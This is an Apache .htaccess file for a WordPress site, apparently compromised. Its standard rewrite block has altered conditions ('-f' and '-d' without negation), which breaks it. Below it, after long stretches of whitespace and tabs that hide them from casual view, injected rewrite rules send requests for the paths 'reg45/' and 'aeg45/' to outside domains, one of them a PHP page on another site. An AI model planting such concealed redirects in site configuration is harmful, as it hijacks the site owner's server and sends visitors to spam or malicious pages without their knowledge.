## BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress














































































































































































																																												<IfModule mod_rewrite.c>																																												
																																												RewriteRule ^reg45/(.*)$ http://medicalun.com/ [R,L]																																												
																																												RewriteRule ^aeg45/(.*)$ http://www.copticbeba.com/images/bar/index.php [R,L]																																												
																																												</IfModule>																																												























































































